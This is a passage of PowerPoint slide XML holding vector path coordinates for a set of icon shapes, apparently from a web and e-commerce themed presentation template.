                  <a:pt x="15081" y="14167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15081" y="14981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6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6"/>
                  <a:pt x="14672" y="11776"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13213" y="11776"/>
                  <a:pt x="12138" y="12515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3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2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80"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5491" y="15738"/>
                  <a:pt x="5795" y="15773"/>
                  <a:pt x="6026" y="15773"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7003" y="15773"/>
                  <a:pt x="7610" y="15385"/>
                  <a:pt x="7610" y="14276"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7610" y="11816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6606" y="11816"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6606" y="11816"/>
                  <a:pt x="6606" y="14265"/>
                  <a:pt x="6606" y="14265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0" name="Shape 2890"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11076303" y="4397568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1"/>
                  <a:pt x="13249" y="14888"/>
                  <a:pt x="13658" y="15223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14067" y="15570"/>
                  <a:pt x="14655" y="15749"/>
                  <a:pt x="15467" y="15749"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16054" y="15749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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15981" y="14167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15981" y="14981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6"/>
                  <a:pt x="15572" y="11776"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14113" y="11776"/>
                  <a:pt x="13037" y="12515"/>
                  <a:pt x="13031" y="13809"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6169" y="13659"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6023" y="13659"/>
                  <a:pt x="5918" y="13653"/>
                  <a:pt x="5832" y="13636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5832" y="12486"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5905" y="12469"/>
                  <a:pt x="6043" y="12452"/>
                  <a:pt x="6248" y="12452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6750" y="12452"/>
                  <a:pt x="7034" y="12665"/>
                  <a:pt x="7034" y="13023"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7034" y="13422"/>
                  <a:pt x="6704" y="13659"/>
                  <a:pt x="6169" y="13659"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6196" y="11787"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5582" y="11787"/>
                  <a:pt x="5146" y="11822"/>
                  <a:pt x="4836" y="11868"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4836" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5832" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5832" y="14317"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5925" y="14328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5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2"/>
                  <a:pt x="6816" y="11787"/>
                  <a:pt x="6196" y="11787"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11195" y="12954"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11195" y="13537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3"/>
                  <a:pt x="10535" y="13243"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9611" y="11816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8436" y="11816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8436" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9360" y="15709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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12119" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12119" y="11816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11195" y="11816"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11195" y="11816"/>
                  <a:pt x="11195" y="12954"/>
                  <a:pt x="11195" y="12954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4" name="Shape 2707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5423934" y="808686"/>
            <a:ext cx="1146138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E-COMMERCE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105" name="Shape 2707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5794708" y="2746966"/>
            <a:ext cx="404589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WEB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15976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Shape 2893"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="14331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9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3" y="15164"/>
                  <a:pt x="13602" y="15074"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17529" y="11147"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17618" y="11058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3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8"/>
                  <a:pt x="12819" y="7131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4" name="Shape 2894"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="14331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1" y="7131"/>
                  <a:pt x="8836" y="7008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7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8"/>
                  <a:pt x="4071" y="11147"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7998" y="15074"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8087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1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5" name="Shape 2895"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2017213" y="1433100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7" y="15709"/>
                  <a:pt x="20102" y="15764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4"/>
                  <a:pt x="1253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10" y="16458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29" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11071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0" y="16458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6" name="Shape 2896"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2550474" y="1433100"/>
            <a:ext cx="139664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5"/>
                  <a:pt x="11071" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10529" y="0"/>
                  <a:pt x="10284" y="55"/>
                  <a:pt x="10106" y="144"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="288" y="5053"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="5142"/>
                  <a:pt x="0" y="5264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3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7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4"/>
                  <a:pt x="21490" y="5142"/>
                  <a:pt x="21312" y="50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7" name="Shape 2897"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="1502932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499"/>
                  <a:pt x="5891" y="1253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0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1"/>
                  <a:pt x="55" y="11317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8" name="Shape 2898"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="1502932"/>
            <a:ext cx="279328" cy="13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0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3"/>
                  <a:pt x="15764" y="1499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7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7"/>
                  <a:pt x="21600" y="11071"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="10529"/>
                  <a:pt x="21545" y="10284"/>
                  <a:pt x="21456" y="1010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899" name="Shape 2899"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4093122" y="1509280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1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1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78"/>
                  <a:pt x="60" y="1648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48"/>
                  <a:pt x="21600" y="1378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0" name="Shape 2900"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4626383" y="1509280"/>
            <a:ext cx="253935" cy="1269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1"/>
                  <a:pt x="10949" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10651" y="0"/>
                  <a:pt x="10516" y="121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2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2"/>
                  <a:pt x="21540" y="19953"/>
                  <a:pt x="21442" y="197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1" name="Shape 2901"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5223127" y="1445797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4"/>
                  <a:pt x="21600" y="689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49"/>
                  <a:pt x="120" y="11084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2" name="Shape 2902"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5756388" y="1445797"/>
            <a:ext cx="12696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89"/>
                  <a:pt x="121" y="824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4"/>
                  <a:pt x="21600" y="10949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3" name="Shape 2903"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859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1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1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4" name="Shape 2904"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120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5" name="Shape 2905"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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764" y="5400"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="5129"/>
                  <a:pt x="12544" y="4909"/>
                  <a:pt x="12273" y="4909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12137" y="4909"/>
                  <a:pt x="12015" y="4964"/>
                  <a:pt x="11926" y="5053"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7017" y="10453"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6928" y="10542"/>
                  <a:pt x="6873" y="10665"/>
                  <a:pt x="6873" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="10936"/>
                  <a:pt x="6928" y="11058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7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8"/>
                  <a:pt x="12764" y="5536"/>
                  <a:pt x="12764" y="5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6" name="Shape 2906"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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7" name="Shape 2907"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903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40" y="184"/>
                  <a:pt x="12764" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12493" y="184"/>
                  <a:pt x="12273" y="404"/>
                  <a:pt x="12273" y="675"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="946"/>
                  <a:pt x="12493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4"/>
                  <a:pt x="9107" y="184"/>
                  <a:pt x="8836" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8761" y="184"/>
                  <a:pt x="8691" y="205"/>
                  <a:pt x="8627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2" y="9818"/>
                  <a:pt x="6382" y="10038"/>
                  <a:pt x="6382" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="10445"/>
                  <a:pt x="6437" y="10567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7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3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1" y="9873"/>
                  <a:pt x="7009" y="9818"/>
                  <a:pt x="6873" y="98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8" name="Shape 2908"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="202984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3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3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1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10445" y="21321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1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21464" y="1521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09" name="Shape 2909"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="2029844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3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2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2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0" name="Shape 2910"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4677169" y="1966361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8"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19800" y="1638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3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1" name="Shape 2911"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5210431" y="1966361"/>
            <a:ext cx="15236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8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3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2" name="Shape 2912"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208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0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6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0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8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2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8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3" name="Shape 2913"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6213470" y="14331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4" name="Shape 2914"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6746731" y="14331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5"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11040" y="7906"/>
                  <a:pt x="10927" y="7855"/>
                  <a:pt x="10800" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10673" y="7855"/>
                  <a:pt x="10559" y="7906"/>
                  <a:pt x="10473" y="7985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0" y="13694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4"/>
                  <a:pt x="16073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1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5" name="Shape 2915"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7279992" y="14331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7"/>
                  <a:pt x="6924" y="11041"/>
                  <a:pt x="7003" y="11127"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7000" y="11130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11909" y="16530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11912" y="16527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0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12633" y="5728"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12713" y="5641"/>
                  <a:pt x="12764" y="5527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6" name="Shape 2916"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7813253" y="14331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7"/>
                  <a:pt x="8887" y="5641"/>
                  <a:pt x="8967" y="5728"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8964" y="5730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7"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9691" y="16530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14600" y="11130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14597" y="11127"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14676" y="11041"/>
                  <a:pt x="14727" y="10927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7" name="Shape 2917"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8390952" y="1433100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1" y="14495"/>
                  <a:pt x="212" y="14584"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10290" y="21456"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10421" y="21545"/>
                  <a:pt x="10601" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10999" y="21600"/>
                  <a:pt x="11179" y="21545"/>
                  <a:pt x="11310" y="21456"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21388" y="14584"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21519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8" name="Shape 2918"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8924213" y="1433100"/>
            <a:ext cx="19045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5"/>
                  <a:pt x="10999" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10601" y="0"/>
                  <a:pt x="10422" y="55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19" name="Shape 2919"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413036" y="1477538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1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0" name="Shape 2920"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946297" y="1477538"/>
            <a:ext cx="279328" cy="19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1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1"/>
                  <a:pt x="21545" y="10421"/>
                  <a:pt x="21456" y="1029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1" name="Shape 2921"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648" y="1433100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2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14652" y="144"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14530" y="55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49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3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8"/>
                  <a:pt x="21600" y="5536"/>
                  <a:pt x="21600" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="5264"/>
                  <a:pt x="21524" y="5142"/>
                  <a:pt x="21402" y="50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2" name="Shape 2922"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11012819" y="1471190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8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3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8"/>
                  <a:pt x="21545" y="7070"/>
                  <a:pt x="21456" y="6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3" name="Shape 2923"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6213470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0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9" y="11837"/>
                  <a:pt x="8980" y="11926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8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3" y="12531"/>
                  <a:pt x="9818" y="12408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4" name="Shape 2924"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6746731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3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8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5" name="Shape 2925"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7279992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2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1"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5946" y="14960"/>
                  <a:pt x="5891" y="15083"/>
                  <a:pt x="5891" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="15489"/>
                  <a:pt x="6111" y="15709"/>
                  <a:pt x="6382" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6517" y="15709"/>
                  <a:pt x="6640" y="15654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1"/>
                  <a:pt x="20838" y="5890"/>
                  <a:pt x="21109" y="5890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21380" y="5890"/>
                  <a:pt x="21600" y="5671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8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="20618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6" name="Shape 2926"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7813253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0"/>
                  <a:pt x="7448" y="1949"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16407" y="4809"/>
                  <a:pt x="17536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0"/>
                  <a:pt x="16610" y="0"/>
                  <a:pt x="491" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="0"/>
                  <a:pt x="0" y="220"/>
                  <a:pt x="0" y="491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="762"/>
                  <a:pt x="219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5" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10038" y="14727"/>
                  <a:pt x="9818" y="14947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5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7" name="Shape 2927"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8346514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6" y="9012"/>
                  <a:pt x="16407" y="16791"/>
                  <a:pt x="7448" y="19651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12844" y="16010"/>
                  <a:pt x="13635" y="8876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5"/>
                  <a:pt x="15845" y="0"/>
                  <a:pt x="15709" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15573" y="0"/>
                  <a:pt x="15450" y="55"/>
                  <a:pt x="15362" y="144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5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19" y="20618"/>
                  <a:pt x="0" y="20838"/>
                  <a:pt x="0" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21380"/>
                  <a:pt x="219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8" name="Shape 2928"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8879775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2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5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8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0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0"/>
                  <a:pt x="9470" y="3150"/>
                  <a:pt x="6873" y="294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29" name="Shape 2929"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413036" y="1966361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5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2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12130" y="3150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0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0" name="Shape 2930"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946297" y="2017148"/>
            <a:ext cx="279328" cy="1777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5"/>
                  <a:pt x="10309" y="10414"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="11186"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10309" y="15233"/>
                  <a:pt x="8221" y="18514"/>
                  <a:pt x="5645" y="18514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3070" y="18514"/>
                  <a:pt x="982" y="15233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4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6"/>
                  <a:pt x="9599" y="0"/>
                  <a:pt x="9327" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9056" y="0"/>
                  <a:pt x="8836" y="346"/>
                  <a:pt x="8836" y="771"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8836" y="3321"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7879" y="2160"/>
                  <a:pt x="6706" y="1543"/>
                  <a:pt x="5645" y="1543"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2527" y="1543"/>
                  <a:pt x="0" y="5515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3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4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4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5"/>
                  <a:pt x="19073" y="1543"/>
                  <a:pt x="15955" y="154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1" name="Shape 2931"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10479558" y="2004451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4"/>
                  <a:pt x="19493" y="6552"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21456" y="3853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3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0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5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0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1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2" name="Shape 2932"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11012819" y="1991754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7"/>
                  <a:pt x="18299" y="6600"/>
                  <a:pt x="18164" y="6600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17892" y="6600"/>
                  <a:pt x="17673" y="6869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69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69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7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69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69"/>
                  <a:pt x="15489" y="15600"/>
                  <a:pt x="15218" y="15600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14947" y="15600"/>
                  <a:pt x="14727" y="15869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4" name="Shape 2934"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918949" y="329589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5" name="Shape 2935"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414119" y="3295894"/>
            <a:ext cx="279126" cy="2791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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2587" y="11273"/>
                  <a:pt x="979" y="8835"/>
                  <a:pt x="979" y="6430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0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11752" y="10208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0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0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4" y="20137"/>
                  <a:pt x="16185" y="20424"/>
                  <a:pt x="16288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7"/>
                  <a:pt x="16926" y="20942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8" y="20256"/>
                  <a:pt x="18193" y="19950"/>
                  <a:pt x="18039" y="19727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17885" y="19505"/>
                  <a:pt x="17579" y="19449"/>
                  <a:pt x="17357" y="19604"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16249" y="13042"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16109" y="12790"/>
                  <a:pt x="16024" y="12529"/>
                  <a:pt x="15995" y="12265"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15966" y="11995"/>
                  <a:pt x="15731" y="11801"/>
                  <a:pt x="15456" y="11829"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15187" y="11859"/>
                  <a:pt x="14992" y="12100"/>
                  <a:pt x="15022" y="12370"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15064" y="12767"/>
                  <a:pt x="15190" y="13154"/>
                  <a:pt x="15395" y="13522"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15484" y="13682"/>
                  <a:pt x="15651" y="13773"/>
                  <a:pt x="15822" y="13773"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15904" y="13773"/>
                  <a:pt x="15985" y="13753"/>
                  <a:pt x="16061" y="13710"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16297" y="13578"/>
                  <a:pt x="16382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3" y="14708"/>
                  <a:pt x="17538" y="14439"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17349" y="14246"/>
                  <a:pt x="17039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8" y="15612"/>
                  <a:pt x="17471" y="15851"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17568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2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18373" y="15777"/>
                  <a:pt x="18413" y="15469"/>
                  <a:pt x="18249" y="15254"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="21476" y="5928"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21352" y="5687"/>
                  <a:pt x="21057" y="5592"/>
                  <a:pt x="20817" y="5717"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20817" y="5717"/>
                  <a:pt x="20650" y="5803"/>
                  <a:pt x="20371" y="5962"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20136" y="6096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7" y="6880"/>
                  <a:pt x="20780" y="6859"/>
                  <a:pt x="20856" y="6815"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21108" y="6672"/>
                  <a:pt x="21261" y="6592"/>
                  <a:pt x="21265" y="6590"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21506" y="6466"/>
                  <a:pt x="21600" y="6170"/>
                  <a:pt x="21476" y="5928"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18659" y="16886"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18395" y="16941"/>
                  <a:pt x="18225" y="17201"/>
                  <a:pt x="18280" y="17467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18312" y="17625"/>
                  <a:pt x="18330" y="17781"/>
                  <a:pt x="18330" y="17929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18330" y="18050"/>
                  <a:pt x="18318" y="18171"/>
                  <a:pt x="18296" y="18287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18244" y="18554"/>
                  <a:pt x="18418" y="18811"/>
                  <a:pt x="18683" y="18862"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18715" y="18869"/>
                  <a:pt x="18746" y="18871"/>
                  <a:pt x="18777" y="18871"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19007" y="18871"/>
                  <a:pt x="19212" y="18708"/>
                  <a:pt x="19257" y="18473"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19292" y="18296"/>
                  <a:pt x="19309" y="18114"/>
                  <a:pt x="19309" y="17929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19309" y="17715"/>
                  <a:pt x="19285" y="17492"/>
                  <a:pt x="19239" y="17267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19183" y="17001"/>
                  <a:pt x="18923" y="16832"/>
                  <a:pt x="18659" y="16886"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18590" y="7106"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18317" y="7303"/>
                  <a:pt x="18035" y="7518"/>
                  <a:pt x="17756" y="7745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17546" y="7917"/>
                  <a:pt x="17515" y="8226"/>
                  <a:pt x="17686" y="8436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6"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="14704" y="20512"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14393" y="20556"/>
                  <a:pt x="14065" y="20590"/>
                  <a:pt x="13729" y="20611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1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6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2" y="19997"/>
                  <a:pt x="8299" y="19866"/>
                  <a:pt x="8052" y="19721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8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7856" y="20744"/>
                  <a:pt x="8194" y="20901"/>
                  <a:pt x="8562" y="21034"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8617" y="21053"/>
                  <a:pt x="8672" y="21062"/>
                  <a:pt x="8728" y="21062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
